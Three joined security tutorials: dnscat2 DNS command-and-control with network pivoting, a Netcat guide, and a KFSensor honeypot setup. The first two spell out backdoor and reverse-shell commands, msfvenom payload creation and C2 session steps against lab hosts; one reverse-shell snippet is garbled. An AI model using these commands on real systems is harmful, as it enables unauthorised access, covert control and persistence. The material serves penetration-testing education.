dnscat2: Command and Control over the DNS

In this article, we learn DNS tunnelling through an amazing tool i.e. DNScat2

Table of Content :

·         Introduction to DNS

·         Introduction to DNScat

·         Installation

·         DNS tunnelling

·         Conclusion

Introduction to DNS

The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it's conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site's content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses the port 53.

Introduction to DNScat

DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don't need have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in packet log.

DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.

The client is intended to be kept running on a target machine. It's written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which are then directed to the legitimate DNS server for that domain (which you, apparently, have control of).

The server is intended to be kept running on a definitive DNS server. It's developed in ruby, and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. If gets other traffic it will automatically disregard it but, however, it can also advance it upstream.

Installation

Run the following git command to download dnscat2 :

git clone https://github.com/iagox86/dnscat2.git

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :

gem install bundler

bundle install

Once everything is done, the server will run with the following command :

ruby dnscat2.rb

Similarly, download dnscat2 in the client machine too.  And use make command to compile it with server, as shown in the image below :

To establish a connection between client and server, use the following command :

./dnscat2 –dns-server=192.168.174.131,port=53

Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.

To interact with the said session type the following command :

session -i 1

As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.

Following will be the response on the client side of the ping command.

Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.

To interact with the shell session that is opened in a new terminal, type following set of commands :

windows

session -i 2

Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.

DNS tunnelling

DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.

For DNS tunnelling, type the following command :

listen 127.0.0.1:888 10.0.0.10:22

Now you can try and connect to the SSH port with the following command :

ssh cell@127.0.0.1 -p 888

Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :

As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have you session on the DNScat2 server :

dnscat2.exe –dns+server+192.168.174.131,port+53

Once the above command is executed, you will have a new session that you can access with the following set of commands :

sessions

session -i 2

And once you have access of the session, you can run any command.

Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.

Comprehensive Guide on Netcat

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.

Table of Contents:

·         Introduction

·         Features

·         Getting start with NC

·         Connecting to a Server

·         Fetching HTTP header

·         Chatting

·         Creating a Backdoor

·         Verbose Mode

·         Save Output to Disk

·         Port Scanning

·         TCP Delay Scan

·         UDP Scan

·         Reverse TCP Shell Exploitation

·         Randomize Port

·         File Transfer

·         Reverse Netcat Shell Exploitation

·         Banner grabbing

Introduction to Netcat

Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In case of attacking, it can be driven by scripts which makes it quite dependable back-end. and if we talk about security, it helps us to debug the network along with investing it.

Features

·         Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you you control every character sent and view the raw, unfiltered responses.

·         Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.

·         Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you're using.

·         Encrypt communication with SSL, and transport it over IPv4 or IPv6.

·         Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.

·         Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.

Getting start with NC

To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one :

nc -h

Connecting to a Server

Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at specific port where a particular service running. In our case the port is 21 i.e. FTP.

Syntax: nc [Target IP Address] [Target Port]

nc 192.168.1.6 21

As we can see in the given image, we have vsFTPd installed on the server, and after giving the Login credentials we have successfully logged in the FTP Server.

Fetching HTTP header

We can use netcat to fetch the information about any webserver. Let’s get back to the server we connected to earlier. It also has HTTP service running on port 80. So, we connected to HTTP service using netcat as we did earlier. Now after connecting to the server we use the option that will give us the header along with the source code of the HTTP service running on the remote server.

nc 192.168.1.6 80

HEAD/HTTP/1.0

As we can see in the given image that the header and source code is displayed through the netcat connection.

Chatting

Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with different operating system.

User 1

OS: Windows 10

IP Address: 192.168.1.4

Role: Listener

User 2

OS: Kali Linux

IP Address: 192.168.1.35

Role: Initiator

Now in each and every scenario, regarding netcat. This step is prominent. First we will have to create a listener. We will use following command to create a listener:

nc -lvvp 4444

where,

[-l]: Listen Mode

[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}

[p]: Local Port

Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.

NOTE: Use the same port to create an initiator which was used in creating listener

nc 192.168.1.4 4444

Creating a Backdoor

We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.

nc -l -p 2222 -e /bin/bash

This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.

nc 192.168.1.35 2222

Verbose Mode

In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode. In the image give below, we can see that when we add [-v] to the netcat command it displays the information about the process that its performance while connecting to the server.

nc 192.168.1.6 21 -v

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.

nc 192.168.1.6 21 -v -o /root/output.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.

Port Scanning

Netcat can be used as a port scanner although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter. It tells netcat to scan listing daemon without sending any data. This makes it possible for netcat to understand the type of service that is running on that specific port. Netcat can perform TCP and UDP scan.

TCP Scan

nc -v -n -z -w 2 192.168.1.6 21-1100

Here,

·         [-v]: indicates Verbose mode

·         [-n]: indicates numeric-only IP addresses

·         [-z]: indicates zero -I/O mode [used for scanning]

·         [-w]: indicates timeout for connects and final net reads

Also, to perform a port scan netcat needs a range of port numbers. We can provide a range of ports to scan.

From the given image we can see that the target machine has lots of ports open with various services running on them.

nc -v -n -z -w 2 192.168.1.6 21-1100

 

TCP Delay Scan

In order to not to be noisy in an environment, it is recommended to use a delayed scan. Now to perform a delay scan, we need to specify the delay. We will use the [-i] parameter to specify the delay in sending next packet in seconds.

nc -z -v -i 10 192.168.1.6 21-80

UDP Scan

Netcat can scan the UDP ports in a similar way it scanned the TCP ports. We are going to use [-u] parameter to invoke the UDP mode.

nc -vzu 192.168.1.6 80-90

Reverse TCP Shell Exploitation

We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe

We are using the shell_reverse_tcp payload to get a session. We have provided with Local IP address and port and then exported the script inside an Executable(exe) file. Now we will create a listener using netcat on the port we provided during the payload creation. We will now have to send the payload file to the target. When the target will run the executable file, we will get a session on our netcat listener.

nc -lvvp 2124

Randomize Port

If we can’t decide our very own port to start listener or establish our Netcat connection. Well netcat has a special -r parameter for us which gives us randomize local port.

nc -lv -r

File Transfer

Netcat can be used to transfer file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.

nc -v -w 30 -p 8888 -l < C:\netcat\output.txt

Now we will have to receive the file shared on Kali Linux. Here we will provide netcat with the Windows IP Address and the port which hosts the file. And write the output inside a text file. For doing this we will use the following command:

nc -v -w 2 192.168.1.4 8888 > output.txt

Reverse Netcat Shell Exploitation

We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R

So, when you execute the above command; you will get another command that has to be run in the target system, as shown in the image below, you will have your session as shown in the image above.

Another way to have a reverse shell is by executing the following command in the target system :

mknod /tmp/backpipe p

/bin/sh 0

/tmp/backpipe

And then when you start netcat as shown in the image below, you will have a session.

Banner grabbing

To grab the target port banner from netcat, use the following command :

nc -v 192.168.1.2 22

So, this was a basic guide to netcat. Its quite an interesting tool to use as well as it is pretty easy.

Threat Detection for your Network using Kfsensor Honeypot

In this article, however, we will set up a framework to draw in attacker so we can catch or study them. Since almost the majority of the attackers around the globe are focusing on Windows servers for the various of their known defects and vulnerabilities, we will set up a Windows framework to do only that. we will set up a honeypot. In the event that you abandon it ready for action, you can watch other attackers rehearsing their attack and prepare for it.

Table of content:

·         Introduction to Honeypot

·         Introduction to KFSensor

·         Working of KFSensor

Introduction to Honeypot

Honeypot disguises itself as an actual server to give the false idea to the attackers and divert their attacks. Therefore, honeypot should be set up just like the real server so that data can appear to be authentic by showing fake files, fake ports, fake directories, etc. As the honeypot creates the illusion of being legitimate; the attacker tends to believe that they have gained accessed of the real deal. One of the main differences is the area of the machine in connection to the genuine servers. The disguised machine is normally set someplace in the DMZ. This guarantees the inner system isn't presented to the attacker. Honeypots work by checking and\or once in a while controlling the interloper amid their utilization of the Honeypot. This should be possible whether the assault originated all things considered or within the system, contingent upon the area of the distraction framework. Honeypots are commonly intended to review the action of an interloper, spare log documents, and record such occasions as the procedures began, orders, a record includes, erases, changes, and even keystrokes.

Introduction to KFSensor

KFSensor is a honeypot for a windows system. it also acts as an IDS. Its job is to attract and detect all the attackers in the network, hence the name 'Honeypot'. It does so by imitating a vulnerable environment and disguising itself as a server and it way, it succeeds to not only catch the attacker but also helps to know their motive. It is specifically designed for windows therefore it contains a lot of windows dedicated unique features. It’s quite convenient to use and a user friendly due its GUI based console, along with its low maintains.

Working of KFSensor

KFSensor's role is to be a decoy server for the attackers in order to protect the real thing. It does its job perfectly by opening fake ports on the system where it's installed and gathering the information when a connection is made. It does this in precisely the same way as routine server program, such as a web server or an SMTP server. By doing this it sets up a target, or a honeypot server, that will record the activities of an attacker.

Working with KFSensor

After downloading and installing KFSensor, when you turn it on, you will see the following window. Here, click on next.

Then it will ask you to select the ports as shown in the image below, after selecting the ports click on next button.

Then it will ask you if you want get email notification of its alerts over the time. So, here, you can add the email from which you want to send and the email where you want to receive the mails.

After these formalities, click on finish button.

Once, you click on the finish button, it will show you the following window.

Now, as the honeypot has been setup, if you scan the victim target (which is installed with honeypot) using nmap, it will show you all the ports open ass a decoy, just like its shown in the image below :

And in KFSensor it will show the details of the scan along with its IP. It will also generate an alarm to alert you.

If the attacker is using any other tool to scan the network, like Nessus, even then the working of KFSensor will be same. For instance, if the attack is through Nessus as shown in the image below :

And when the attack from Nessus is completed, it will show you the faux result as you can see in the image below :

And similarly, the KFSensor will alert you as it is shown in the image below :

This way, KFSenor is the best way to detect and confuse the attacker in order to save yourself and be cautious.